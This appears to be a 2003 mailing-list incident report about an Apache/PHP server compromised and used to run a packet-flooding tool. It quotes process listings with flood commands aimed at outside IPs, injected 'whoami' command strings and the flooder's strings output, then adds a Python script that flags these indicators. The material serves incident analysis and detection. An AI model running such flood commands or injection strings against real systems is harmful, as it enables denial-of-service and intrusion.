Another overflow exploit for Apache?
From: Dayne Jordan (djordan completeweb.net)
Date: Wed Jul 02 2003 - 13:08:25 CDT
Greetings,
Over the past 2 days we were alerted to 2 machines doing over 10 Mbit/s
each. Upon further investigation here is what we found...
Let's start with OS and essentials:
=====================================
- BSDi 4.2, patched current
- Apache 1.3.27 (running as nobody:nobody) non-suexec
- PHP-4.3.2 (allow_uploads=Off)
We have found v2k.tar uploaded to /tmp/ and a new directory: /tmp/v/.
su-2.02# ls -la /tmp
drwxrwxrwt 2 root wheel 2560 Jul 2 13:40 .
drwxr-xr-x 17 root wheel 512 Nov 3 2002 ..
-rw-r--r-- 1 nobody wheel 1762550 Jul 2 12:07 iprot-ip_log
-rw-r--r-- 1 nobody wheel 739326 Jul 2 11:13 iprot-user_log
-rw-r--r-- 1 nobody wheel 16384 Jul 2 13:48 iprot.db
srwxrwxrwx 1 root wheel 0 Apr 29 02:16 mysql.sock
drwxr-xr-x 3 nobody wheel 512 Oct 9 2002 v
-rw-r--r-- 1 nobody wheel 253952 Jul 2 09:21 v2k.tar
Contents of /tmp/v:
su-2.02# ls -lR
total 164
-rwxr-xr-x 1 nobody wheel 13157 Nov 28 2002 hell
-rw-r--r-- 1 nobody wheel 102400 Sep 13 2002 k.tar
drwxr-xr-x 2 nobody wheel 512 Nov 28 2002 netbios
-rwxr-xr-x 1 nobody wheel 21866 Oct 9 2002 usg
-rwxr-xr-x 1 nobody wheel 15807 Nov 8 2002 vadimI
./netbios:
total 94
-rwxr-xr-x 1 nobody wheel 53760 Nov 28 2002 nbtscan
-rwxr-xr-x 1 nobody wheel 18070 Nov 28 2002 smbkill
-rwxr-xr-x 1 nobody wheel 23305 Nov 28 2002 smbnuke
The program found running was 'hell':
An excerpt from ps aux/axl:
nobody 3981 1 252 22385e0 0 I ?? 0:00.01 sh -c v/hell 62.221.xxx.xx 110 2>&1
nobody 3982 3981 252 22385e0 0 RN ?? 10:17.28 v/hell 62.221.xxx.xx 110
nobody 4002 1 252 22385e0 0 I ?? 0:00.07 sh -c v/hell 62.221.xxx.xx 110 2>&1
nobody 4003 4002 252 22385e0 0 R ?? 9:53.19 v/hell 62.221.xxx.xx 110
nobody 4033 1 252 22385e0 0 I ?? 0:00.09 sh -c v/hell 202.8.xxx.xxx 110 2>&1
nobody 4034 4033 252 22385e0 0 R ?? 8:18.19 v/hell 202.8.xxx.xxx 110
nobody 4051 1 252 22385e0 0 I ?? 0:00.08 sh -c v/hell 202.8.xxx.xxx 110 2>&1
nobody 4052 4051 252 22385e0 0 R ?? 7:40.63 v/hell 202.8.xxx.xxx 110
nobody 4122 1 252 22385e0 0 I ?? 0:00.04 sh -c v/hell 202.73.xxx.xxx 110\r\nwhoami; 2>&1
nobody 4179 1 252 22385e0 0 I ?? 0:00.06 sh -c v/hell 202.73.xxx.xxx 110\r\nwhoami; 2>&1
nobody 4180 4179 252 22385e0 0 R ?? 4:43.55 v/hell 202.73.xxx.xxx 110\r
nobody 4213 1 252 22385e0 0 I ?? 0:00.05 sh -c v/hell 66.151.xx.xx 110\r\nwhoami; 2>&1
su-2.02# strings hell
/lib/ld-linux.so.2
__gmon_start__
libc.so.6
printf
connect
socket
bzero
send
__deregister_frame_info
bcopy
gethostbyname
htons
exit
atoi
_IO_stdin_used
__libc_start_main
__register_frame_info
GLIBC_2.0
PTRh
Bombing %s, port %d
Unknown host: %s
Syntax: ./hell host port
Port can be any port, any of them work equally well
FUCKER!!!!
su-2.02#
- System binaries are fine (checked against md5 output from known-good BSDi 4.2 machines)
- Nothing unusual running via netstat/sockstat
- Scanned externally for anything rogue listening - 0 found.
- root/admin accounts are not compromised
The v2k.tar date/time was 09:21 July 2nd, 2003. A grep through all the webserver
logs for 1-2 minutes on either side of that time does not reveal any unusual
requests that would look like an overflow-type string that we've seen attempted
in the past.
Any clues?
D.
===========
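Added example, not part of the post: a small Python triage pass over ps(1) lines like the ones quoted above, flagging the indicators the post itself shows: the web-server user running a binary from /tmp or a relative path, `sh -c` children reparented to init, CR/LF (or the escaped form ps prints) embedded in argv, and minutes of CPU on a web-user process. The three suspect lines are copied from the post; the two benign lines, the set of web-server accounts and the CPU threshold are assumptions.

```python
import re

# Constructed sample input: ps(1) lines as quoted in the post (addresses masked
# there already) plus two benign lines added for contrast.
PS_LINES = [
    r"nobody 3981 1 252 22385e0 0 I ?? 0:00.01 sh -c v/hell 62.221.xxx.xx 110 2>&1",
    r"nobody 3982 3981 252 22385e0 0 RN ?? 10:17.28 v/hell 62.221.xxx.xx 110",
    r"nobody 4122 1 252 22385e0 0 I ?? 0:00.04 sh -c v/hell 202.73.xxx.xxx 110\r\nwhoami; 2>&1",
    r"root 1 0 0 0 0 Is ?? 0:01.00 /sbin/init --",
    r"nobody 2211 2205 0 0 0 S ?? 0:00.40 /usr/local/apache/bin/httpd",
]

WEB_USERS = {"nobody", "www"}          # assumption: accounts the web server runs as
TMP_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")
CPU_MINUTES_LIMIT = 5.0                # assumption: a CGI/PHP child burning minutes of CPU is odd
CRLF = re.compile(r"\r\n|\\r\\n")      # real CR/LF, or the escaped form ps prints

def cpu_minutes(field):
    """Convert the ps TIME column (M:SS.ss or H:MM:SS) to minutes."""
    parts = [float(p) for p in field.split(":")]
    return parts[0] * 60 + parts[1] + parts[2] / 60 if len(parts) == 3 else parts[0] + parts[1] / 60

def triage(line):
    """Return the indicators that make one ps line worth a closer look."""
    cols = line.split(None, 9)         # USER PID PPID CPU WCHAN ? STAT TT TIME COMMAND
    if len(cols) < 10:
        return []
    user, _pid, ppid, _cpu, _wchan, _, _stat, _tt, time_, cmd = cols
    hits = []
    if CRLF.search(cmd):               # a trailing "\r\nwhoami;" means commands were pasted into an injection point
        hits.append("crlf-in-argv")
    for tok in cmd.split():
        if "/" in tok and (tok.startswith(TMP_DIRS) or not tok.startswith("/")):
            hits.append("exec-from-tmp-or-relative-path")
            break
    if user in WEB_USERS and ppid == "1" and cmd.startswith("sh -c"):
        hits.append("web-user-shell-reparented-to-init")
    if user in WEB_USERS and cpu_minutes(time_) > CPU_MINUTES_LIMIT:
        hits.append("web-user-high-cpu")
    return hits

def triage_all(lines):
    """Map PID -> indicators for every flagged line; clean lines are omitted."""
    out = {}
    for line in lines:
        hits = triage(line)
        if hits:
            out[line.split()[1]] = hits
    return out

if __name__ == "__main__":
    for pid, hits in triage_all(PS_LINES).items():
        print(pid, ", ".join(hits))
```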